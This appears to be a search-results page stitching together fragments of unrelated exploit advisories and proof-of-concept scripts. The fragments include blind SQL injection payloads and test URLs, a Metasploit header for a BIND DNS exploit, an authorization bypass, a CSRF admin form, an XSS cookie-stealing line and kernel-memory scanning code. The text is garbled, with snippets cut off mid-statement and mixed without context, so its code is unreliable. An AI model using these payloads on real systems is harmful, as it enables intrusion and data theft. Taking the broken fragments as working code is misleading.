Next Page >>
true
vulnerability, see /public_html/webservices/atom/index.php near lines 34-53:
...
require_once '../../lib-common.php';
if (PHP_VERSION < 5) {
$_CONF['disable_webservices'] = true;
} else {
require_once $_CONF['path_system'] . '/lib-webservices.php';
}
if ($_CONF['disable_webservices']) {
COM_displayMessageAndAbort($LANG_404[3], '', 404, 'Not Found');
my_header();
if (php_sapi_name() <> "cli") {
die($err[0]);
}
if (!extension_loaded('curl')) {
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :
false;
if ($win) {
!dl("php_curl.dll") ? die($err[1]) :
print("[*] curl loaded\n");
} else {
function main()
{
$this->mhead();
# Gimme your args
$this->p_attack = $this->get_p('attack', true);
$this->p_prox = $this->get_p('proxhost');
$this->p_proxa = $this->get_p('proxauth');
$this->init_global();
/* check readable */
if ( IsBadReadPtr ( base , 1 ) == FALSE )
{
/* set flag */
r = TRUE;
}
/* check writeable */
if ( IsBadWritePtr ( base , 1 ) == FALSE )
{
/* set flag */
[
[ 'CVE', '2008-1447' ],
[ 'US-CERT-VU', '8000113' ],
[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0002.txt' ],
],
'Privileged' => true,
'Targets' =>
[
["BIND",
{
'Arch' => ARCH_X86,
Special thanks to Reiners for this sqli filter evasion cheat sheet:
http://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/
Here are some changes I had to make to my blind sql injection class:
"select substring('abc',1,1)"=>"select substring('abc' from 1 for 1)"
if(greatest(".sprintf($question,$cur).",".$pos.")!=".$pos.",sleep(".$this->timeout."),0)" =>"case ".sprintf($question,"0+".$cur).">".$pos." when true then sleep(".$this->timeout.") end"
CWE Violations leveraged by this exploit:
CWE-256: Plaintext Storage of a Password
CWE-804: Guessable CAPTCHA (I asked that they create this CWE when I ran into a guy that works for Mitre.)
CWE-89: SQL Injection x2
> [
> [ 'CVE', '2008-1447' ],
> [ 'US-CERT-VU', '8000113' ],
> [ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0002.txt' ],
> ],
> 'Privileged' => true,
> 'Targets' =>
> [
> ["BIND",
> {
> 'Arch' => ARCH_X86,
if (php_sapi_name() <> "cli") {
die($err[0]);
}
if (!extension_loaded('curl')) {
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :
false;
if ($win) {
!dl("php_curl.dll") ? die($err[1]) :
nil;
} else {
$this->agent('Mozilla Firefox');
$this->cookiejar(1);
$this->mhead();
$this->uri = $this->getparam('url', TRUE);
$this->url_arr = parse_url($this->uri);
$this->patch = $this->getparam('patch');
$this->proxh = $this->getparam('proxhost');
$this->proxa = $this->getparam('proxauth');
extract($HTTP_GET_VARS);
}
This lets an attacker set demoSession=1 to bypass authorization and
freely access any part of the application. Setting the variable to one
bypasses the first check ($demoSession != true) but the second boolean
expression ($demoSession == 'true') evaluates to false thereby not
initializing the action variable to an empty string.
// check session validity, except for demo user
if (($checkSession == true) && ($demoSession != true)) {
$A['showonline'] = 1;
} else {
$A['showonline'] = 0;
}
$A['maxstories'] = COM_applyFilter ($A['maxstories'], true);
if (empty ($A['maxstories'])) {
$A['maxstories'] = 0;
} else if ($A['maxstories'] > 0) {
if ($A['maxstories'] < $_CONF['minnews']) {
$A['maxstories'] = $_CONF['minnews'];
for( pos=0x80000000; pos<0xfffff000; pos=pos+0x1000 )
{
ret = ReadKernelMemory( (void*) (pos+0x0ea), (void*) buffer, 5 ); /*
Read the complete block */
if ( ret == TRUE )
{
if ( memcmp(buffer, pattern, 5) == 0 )
{
/* If match */
code_address = pos + 0x0ea;
{
echo "<h3>Customerid: " . $customerid .
"</h3>\n";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, "fws_guest=" . $customerid);
$result = curl_exec($ch);
curl_close($ch);
$result = str_replace("\n", "", $result);
preg_match("/(Wat zit er in uw winkelwagen.*)<\/table>/", $result,
~~~~~~~~~~~~~~~~1.2.1 ChangeDisplay.htm~~~~~~~~~~~~~~~~~~~~~~~~
<script>
function check(){
_action = '/AdminSettings/displays.asp?DecideAction=1&ChangeSkin=1'
frmDisplay.action = window.document.all.URL.value + _action
return true;
}
</script>
URL: <input type="text" name="URL" />
<form name="frmDisplay" action="" method="post" onsubmit="return check()">
<input type="hidden" name="TemplateSkin" value="PanelXP/Blue" />
#######################################################################
Luigi Auriemma
Application: Acronis True Image Windows Agent
http://www.acronis.com/enterprise/products/ATIES/windows-agent.html
Versions: <= 1.0.0.54
(included in Acronis True Image Enterprise Server
9.5.0.8072 and the other True Image packages)
Platforms: Windows
#ifdef WIN32
#include <windows.h>
#include <io.h>
#else
typedef long long ULONG64;
#define TRUE (-1)
#define FALSE (0)
#endif
#include <stdio.h>
#include <time.h>
#fcms_login_pw=your_real_pass
#
#fcms_login_id=your_real_id+and+1=1
#
#
#(Delete PHPSESSID) Result: True --> Show page
#
#
#fcms_login_user=your_real_name
#
#fcms_login_pass=your_real_pass
Type: ActiveX-Control
Version: 1.6.0.6
GUID: {0C3874AA-AB39-4B5E-A768-45F3CE6C6819}
File: IDAutomationLinear6.dll
Folder: C:\WINDOWS\system32\
Safe for Script: True
Safe for Init: True
Name: IDautomation PDF417 Barcode
Vendor: IDAutomation.com Inc.
*length = (MAX_PACKET_SIZE - sizeof(struct ipcomp)) - zstream.avail_out;
ipcomp = realloc(ipcomp, *length);
free(data);
return true;
}
int main(int argc, char **argv)
{
int s;
30| if ( $_SESSION[ 'site_path' ] ===
| dirname($_SERVER[ 'PHP_SELF' ]) ) {
|
31| if ( $_SESSION[ 'ip' ] === getIP() ) {
32| // User is logged in.
33| return ( true );
34| }
35| }
36| }
Thanks to the getIP() function, if we know the
Type: ActiveX-Control
Version: 1.1.2200.0
GUID: {1E57C6C4-B069-11D3-8D43-00104B138C8C}
File: keyhelp.ocx
Folder: C:\WINDOWS\system32\
Safe for Script: True
Safe for Init: False
Name: KeyScript Class
Vendor: KeyWorks Software
#######################################################################
Luigi Auriemma
Application: Acronis True Image Group Server
http://www.acronis.com/enterprise/products/ATIES/group-server.html
Versions: <= 1.5.19.191
(included in Acronis True Image Enterprise Server
9.5.0.8072 and the other True Image packages)
Platforms: Windows
/webtemp/functions/editor/filemanager/connectors/php/config.php
global $Config ;
// SECURITY: You must explicitly enable this "connector". (Set it to "true").
// WARNING: don't just set "$Config['Enabled'] = true ;", you must be sure that only
// authenticated users can access this file or use some kind of session checking.
$Config['Enabled'] = true ; // <= 1
---
*s SystemUnit Software Version: "TC4.0"
*s SystemUnit Software Name: "s52000"
*s SystemUnit Software ReleaseDate: "2010-11-01"
*s SystemUnit Software MaxVideoCalls: 3
*s SystemUnit Software MaxAudioCalls: 4
*s SystemUnit Software ReleaseKey: "true"
*s SystemUnit Software OptionKeys NaturalPresenter: "true"
*s SystemUnit Software OptionKeys MultiSite: "true"
*s SystemUnit Software OptionKeys PremiumResolution: "true"
*s SystemUnit Hardware Module SerialNumber: "B1AD25A00003"
*s SystemUnit Hardware Module Identifier: "0"
/* evil script */
var $xss='alert("PWN PWN PWN: " + document.cookie);';
function
cURL($cookies=TRUE,$cookie='cookies.txt',$compression='gzip',$proxy='') {
$this->headers[] = 'Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8';
$this->headers[] = 'Connection: Keep-Alive';
$this->headers[] = 'Content-type:
application/x-www-form-urlencoded;charset=UTF-8';
In a recent research that I have done, I found that
60% of the PHP scripts which support Oracle aren't safe !
People think that if they use the function addslashes()
on a string which has quotes, they'll be secured
against SQL Injection. On MySQL that's roughly true, but
on Oracle that's wrong.
The escape character for MySQL is a backslashes, \x92[\].
The escape character for Oracle is a single quote, \x39['].
#Host: [HOST]
#Referer: http://[HOST]/[PATH]/Password.php
#Content-Type: application/x-www-form-urlencoded
#
#resetpwemail=[valid_mail]%27+and+1%3D%270 --> FALSE
#resetpwemail=[valid_mail]%27+and+1%3D%271 --> TRUE
#
#Other P0C (with a registered user):
#
#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=0%23 -->FALSE
#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=1%23 -->TRUE
}
default:
..
}
return true;
}
--------------------------------------------------------------------------------------------------------------------
~/xoops-1.3.10/class/phpsyndication.lib.php
xoops-2.0.16-Kararli/htdocs/class/smarty/internals/core.display_debug_console.php $smarty->_include($_compile_path);
xoops-2.0.16-Kararli/htdocs/class/smarty/internals/core.load_plugins.php include_once
$_plugin_file;
xoops-2.0.16-Kararli/htdocs/class/smarty/internals/core.load_resource_plugin.php include_once($_plugin_file);
xoops-2.0.16-Kararli/htdocs/class/smarty/internals/core.process_cached_inserts.php $smarty->_include($php_resource,
true);
xoops-2.0.16-Kararli/htdocs/class/smarty/internals/core.process_compiled_include.php function
smarty_core_process_compiled_include($params, &$smarty)
xoops-2.0.16-Kararli/htdocs/class/smarty/internals/core.process_compiled_include.php $smarty->_include($_include_file_path,
true);
xoops-2.0.16-Kararli/htdocs/class/smarty/internals/core.run_insert_handler.php $smarty->_include($_params['php_resource'],
#
#---------------------------------------
#PROOF OF CONCEPT (SQL INJECTION):
#---------------------------------------
#
#http://[HOST]/[PATH]/player.php?name=[valid_name]'+and+1=1%23 --> TRUE
#http://[HOST]/[PATH]/player.php?name=[valid_name]'+AND+1=0%23 --> FALSE
#
#
#http://[HOST]/[PATH]/song.php?hash=[valid_song]'+and+1=1%23 --> TRUE
#http://[HOST]/[PATH]/song.php?hash=[valid_song]'+and+1=0%23 --> FALSE
Next Page>>
|
